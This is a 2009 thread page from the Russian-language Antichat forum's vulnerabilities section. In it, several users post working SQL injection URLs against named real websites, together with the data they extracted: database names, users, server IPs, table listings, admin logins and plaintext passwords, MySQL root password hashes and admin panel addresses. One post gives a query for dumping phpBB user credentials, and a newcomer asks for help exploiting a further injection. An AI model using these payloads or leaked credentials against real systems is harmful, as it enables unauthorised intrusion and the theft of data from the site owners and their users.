ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8811  
Старый 11.04.2009, 21:25
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<ИнформоЭКСПО - Информационное выставочное агенство>>

Код:
http://www.informexpo.ru/new/view_content.php?id=-1612'+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6--+
db: 5.0.77-Max-log
name_db: udachax7_main
user: udachax7_main@c4-w.ht-systems.ru
os: unknown-linux-gnu
 
Ответить с цитированием

  #8812  
Старый 11.04.2009, 21:37
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

http://ghosty.ru
Код:
http://ghosty.ru/meet.php?mid=17+UNION+SELECT+1,2,3,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),5,6+LIMIT+1,1--
Database Version: 4.1.22
Database name: ghosty_smart
User name: ghosty_smart@212.193.238.136
 
Ответить с цитированием

  #8813  
Старый 11.04.2009, 23:04
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.kalker-freiheit.net/nachrichten.php?ID=-935+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*
Database Version: 5.0.32-Debian_7etch8
Database name: muelheim
User name: wwwmuelheim@dedi1304.your-server.de

Tables:
Код:
Database [muelheim]
    Table [Kunden]
    Table [LinkKat]
    Table [LinkListe]
    Table [Links]
    Table [Nachrichten]
    Table [NachrichtenLinks]
    Table [Ressourcen]
    Table [Stadtteile]
    Table [TerminInteressenGruppen]
    Table [TerminLinks]
    Table [Termine]
    Table [Testtabelle]
    Table [Veranstalter]
    Table [VeranstalterAnsprechpartner]
    Table [VeranstaltungsOrte]
    Table [VeranstaltungsOrteSozial]
    Table [Werbepartner]
    Table [ZuordnungLink_Nachricht]
    Table [ZuordnungLink_Stadtteil]
    Table [ZuordnungNachricht_Historie]
    Table [ZuordnungNachricht_Kategorie]
    Table [ZuordnungNachricht_Kunde]
    Table [ZuordnungNachrichten_Stadtteil]
    Table [ZuordnungTermin_InteressenGruppen]
    Table [ZuordnungTermin_Kategorie]
    Table [ZuordnungTermin_Kunde]
    Table [ZuordnungTermin_Stadtteil]
    Table [ilinks]
    Table [mUser]
    Table [qub3_queries_que]
    Table [qub3_relations_rel]
    Table [qub3_settings_set]
    Table [sky_newsletter_bann]
    Table [sky_newsletter_log]
    Table [sky_newsletter_main]
    Table [sky_newsletter_settings]
    Table [sky_newsletter_user]
    Table [src_cache_cah]
    Table [src_temp_tmp]
    Table [tempAktuelles]
 
Ответить с цитированием

  #8814  
Старый 12.04.2009, 00:38
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Агенство путешествий "Лазурь">>

Код:
http://www.laurel-travel.ru/country_tour.php?id=-44'+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8--+&country_id=34
db :5.0.22
name_db :wwwlaureltravelr
user :laureltr@localhost
os :redhat-linux-gnu - 4
-=phpbb_users=-
Код:
http://www.laurel-travel.ru/country_tour.php?id=-44'+union+select+1,2,concat_ws(0x3a,username,%20user_password),4,5,6,7,8+from+phpbb_users+limit+1,1--+&country_id=34

Последний раз редактировалось farex; 12.04.2009 в 00:43..
 
Ответить с цитированием

  #8815  
Старый 12.04.2009, 01:43
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.abma.ag/news.php?id=-68+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 4.1.22-max-log
Database name: abma
User name: abma@68.178.254.202

Login: people
Pass: r1d1cul0us


Админка:

http://www.abma.ag/admin
 
Ответить с цитированием

  #8816  
Старый 12.04.2009, 08:18
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

www.vjpsych.ie

Цитата:
http://www.vjpsych.ie/index.php?p=my_vjpsych_sub2&id=57&topic_id=84+UNIO N+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(Ve rsion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0 x71),0x71),6,7,8,9+LIMIT+1,1--
Database Version: 4.1.11-standard
Database name: vjpsych_dbase
User name: vjpsych@localhost
 
Ответить с цитированием

  #8817  
Старый 12.04.2009, 10:32
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Через этот сайт есть доступ еще к нескольким:
Код:
http://www.flu.de/nachrichten.php?id=-6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Database Version: 5.0.32-Debian_7etch8-log
Database name: flu
User name:
Stl_prioR08@standleitungen1.laxin.de

mysql
user : pass : file_priv


Код:
root:*1C903C503D579946C23249F14E07F7C193F98298:Y
debian-sys-maint:*623A3AC39E85E7A6EF73568F10798862B010A411:Y
confixx:*1C903C503D579946C23249F14E07F7C193F98298:N
Stl_prioR08:*F900F6B1E9630A2364799C3251A9EC4B96C465EC:N
Все таблицы/базы на сервере, кроме information_schema & mysql.
Код:
Database [abwahl]
    Table [abwahl_parteien]
    Table [abwahl_personen]
    Table [abwahl_personenverzeichnis]
    Table [abwahl_pol_stimmung]

Database [confixx]
    Table [admin]
    Table [alerts]
    Table [allgemein]
    Table [anbieter]
    Table [angebote]
    Table [atdomains]
    Table [autoresponder]
    Table [backup]
    Table [bdefault]
    Table [billing_del]
    Table [billing_exp]
    Table [bin]
    Table [bmysql]
    Table [config]
    Table [cronjobs]
    Table [cssl]
    Table [custom_skins]
    Table [delaccs]
    Table [dns]
    Table [domainlog]
    Table [domains]
    Table [email]
    Table [email_forward]
    Table [ereignisse]
    Table [events]
    Table [fehlermeldungen]
    Table [frontpage]
    Table [frontpagealias]
    Table [ftp]
    Table [grep]
    Table [htaccess]
    Table [httpd_definitions]
    Table [httpd_entries]
    Table [httpd_permissions]
    Table [httpd_states]
    Table [idn_aliases]
    Table [ipadressen]
    Table [iprestriction]
    Table [kunden]
    Table [logout]
    Table [maillist]
    Table [menublock]
    Table [menuitem]
    Table [mysql_datenbanken]
    Table [nladressen]
    Table [nlinhalt]
    Table [perl]
    Table [personalinfo]
    Table [pop3]
    Table [pwdreminder]
    Table [pwschutz]
    Table [register]
    Table [restore]
    Table [server]
    Table [sessions]
    Table [skins]
    Table [spampref]
    Table [traffic]
    Table [transfer]
    Table [types]
    Table [updates]
    Table [users]
    Table [webalizer]
    Table [webapp]
    Table [webapp2confixx]
    Table [webapp_knowledge]
    Table [webapp_param]
    Table [webapp_requir]
    Table [webapp_user]
    Table [webapp_user_param]
    Table [webmail_ab]
    Table [webmail_def_from]
    Table [webmail_session]
    Table [webmail_sign]
    Table [zeiten]

Database [flu]
    Table [airlines]
    Table [airports]
    Table [bilder]
    Table [comments]
    Table [imglisttrack]
    Table [nachrichten]
    Table [news_anbieter]
    Table [news_entry]
    Table [news_kategorien]
    Table [news_language]
    Table [news_quelle]
    Table [news_users]
    Table [votings]

Database [usr_web126_1]
    Table [faqadminlog]
    Table [faqadminsessions]
    Table [faqchanges]
    Table [faqcomments]
    Table [faqdata]
    Table [faqfragen]
    Table [faqnews]
    Table [faqrights]
    Table [faqrubrik]
    Table [faqsessions]
    Table [faqstatistik]
    Table [faquser]
    Table [faqvisits]
    Table [faqvoting]
    Table [internetfaqadminlog]
    Table [internetfaqadminsessions]
    Table [internetfaqchanges]
    Table [internetfaqcomments]
    Table [internetfaqdata]
    Table [internetfaqfragen]
    Table [internetfaqnews]
    Table [internetfaqrights]
    Table [internetfaqrubrik]
    Table [internetfaqsessions]
    Table [internetfaqstatistik]
    Table [internetfaquser]
    Table [internetfaqvisits]
    Table [internetfaqvoting]

Database [usr_web126_2]
    Table [anfragen]
    Table [angebote]
    Table [auftrag_annahme]
    Table [auslandsstand]
    Table [bandbreiten]
    Table [betreuung]
    Table [blankoformular_sprachen]
    Table [branchenloesungen]
    Table [counter]
    Table [dark_laendernamen]
    Table [forum]
    Table [infos_bonusprovision]
    Table [kunden]
    Table [leitungen_international]
    Table [lexikon_statistik]
    Table [mitarbeiter_aktuell]
    Table [nachrichten]
    Table [orte]
    Table [partner]
    Table [partner_analogxxl]
    Table [passwort]
    Table [plz_de]
    Table [produktdatenbank]
    Table [rubriken]
    Table [shop]
    Table [statistik]
    Table [telefon_alice_citys]
    Table [tk_vorschlaege]
    Table [tkfach]
    Table [turkflat_de_anfrage]
    Table [vertriebspartner_voranmeldung]
    Table [vorwahlen]
    Table [zaehler]

Database [usr_web126_3]
    Table [dark_anbietenphp_sprachen]
    Table [dark_atm_kunden]
    Table [dark_center_sprachen]
    Table [dark_framerelay_kunden]
    Table [dark_glasfaser_kunden]
    Table [dark_glfangebot_sprachen]
    Table [dark_kabel_angebote]
    Table [dark_kontakt_sprachen]
    Table [dark_laendernamen]
    Table [dark_landstandard_sprachen]
    Table [dark_menu_sprachen]
    Table [dark_metatags_sprachen]
    Table [dark_mpls_kunden]
    Table [dark_newsletter_sprachen]
    Table [dark_newsletterkunden]
    Table [dark_passwort]
    Table [dark_satellit_kunden]
    Table [dark_sonstige_anfragen]
    Table [dark_sprachenleiste_sprachen]
    Table [dark_standleitungen_kunden]
    Table [dark_start_sprachen]
    Table [dark_suchenphp_sprachen]
    Table [leitungen_international]
    Table [leitungen_international2]

Database [usr_web126_4]
    Table [besuchervon]
    Table [carrier]
    Table [carrier_standort]
    Table [dsl_auftraege_zuordnung]
    Table [http_referer_stat]
    Table [news_pv]
    Table [partnerdomains]
    Table [partnervertrieb]
    Table [plz_ew]
    Table [plz_vw]
    Table [potentielle_auftraege]
    Table [telefonanschluss_preisuebersicht]
    Table [telekom_auftraege]
    Table [tkw_csv_versendet]
    Table [vertragsunterlagen_de_besuchervon]

Database [usr_web126_5]
    Table [anbieter]
    Table [links]
    Table [metatags]
    Table [produkte]
    Table [searchs]

Database [usr_web126_6]
    Table [anbieter]
    Table [kategorien]
    Table [language]
    Table [nachrichten]
    Table [quelle]
    Table [users]

Последний раз редактировалось mailbrush; 12.04.2009 в 10:34..
 
Ответить с цитированием

  #8818  
Старый 12.04.2009, 11:10
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.cierrenet.it/sing.php?tipo=libro&id=-3976+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--
version():user():database()
5.0.45:cierredb@localhost:libri

PR: 5

cmsms_adminlog

Код:
http://www.cierrenet.it/admin/login.php
 
Ответить с цитированием

  #8819  
Старый 12.04.2009, 11:56
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Stelladimare>>
Код:
http://www.stelladimare.ru/index.php?option=com_news&Itemid=58&task=view&id=-120+union+select+-1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--+
db: 4.1.22
name_db: stelladi_joom0
user: stelladi_cms18@212.193.230.207
os: portbld-freebsd6.2
-
robots.txt
-
Код:
User-agent: Yandex
Disallow: /*?_openstat
Disallow: /*?option=com_cruiseinfo&Itemid=53
Disallow: /templates/stella_di_mare/css/
Disallow: /AC_RunActiveContent.js
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
Host: www.stelladimare.ru

User-agent: Googlebot
Disallow: /*?_openstat
Disallow: /*?option=com_cruiseinfo&Itemid=53
Disallow: /templates/stella_di_mare/css/
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
Disallow: /AC_RunActiveContent.js

User-agent: *
Disallow: /templates/stella_di_mare/css/
Disallow: /AC_RunActiveContent.js
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation
-----------------------
-----------------------

<<Компания "Теремок">>
Код:
http://www.teremok.ru/forum.phtml?act=read&msg=4316+and+1=15+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5--+
db: 5.0.67-log
name_db: u20648
user :u20648@10.10.223.211
os :unknown-freebsd6.2

table: Admin_users

log: padmin
pas: 5bfee75778f81085
-=users=-
limit+Х,Х--+

Последний раз редактировалось farex; 12.04.2009 в 13:20..
 
Ответить с цитированием

  #8820  
Старый 12.04.2009, 14:16
hellworm
Новичок
Регистрация: 20.03.2008
Сообщений: 10
Провел на форуме:
59383

Репутация: 0
Отправить сообщение для hellworm с помощью ICQ
По умолчанию

Нашёл инъекцию , только я совсем новичок и раскрутить не получилось
Код:
http://www.praktik-um.ru/arenda.php?base=1'+union+select+1,2,version(),3,4,5,6,7--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 15 (пользователей: 0 , гостей: 15)
 


Быстрый переход




ANTICHAT.XYZ